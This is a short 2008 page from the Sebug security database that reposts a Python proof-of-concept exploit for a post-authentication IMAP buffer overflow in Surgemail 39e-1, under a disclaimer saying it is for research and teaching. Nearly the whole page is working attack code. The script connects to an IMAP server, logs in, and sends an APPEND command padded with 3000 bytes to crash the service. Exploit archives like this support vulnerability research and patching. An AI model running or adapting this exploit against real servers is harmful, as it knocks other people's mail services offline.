Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS
发布时间(Published):2008-06-30
SBEUGID:SEBUG-20080723999
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/python

#

# Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS.

# Discovered by: Travis Warren


# The IMAP service contains a buffer overflow in the APPEND command. 


#





import socket



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)



buffer = '\x41' * 3000



s.connect(('192.168.0.103',143))

s.recv(1024)

s.send('A001 LOGIN user@test.com user ' + buffer + '\r\n')

s.recv(1024)

s.send('A001 APPEND ' + buffer + '\r\n')

s.recv(1024)

s.close()
// Sebug.net [ 2008-07-01 ]

Home | Submit Info | Lib | Help | Forum | Partners
Copyright © 2006-2008 SEBUG Security Database. All rights Reserved
鄂ICP备05024839号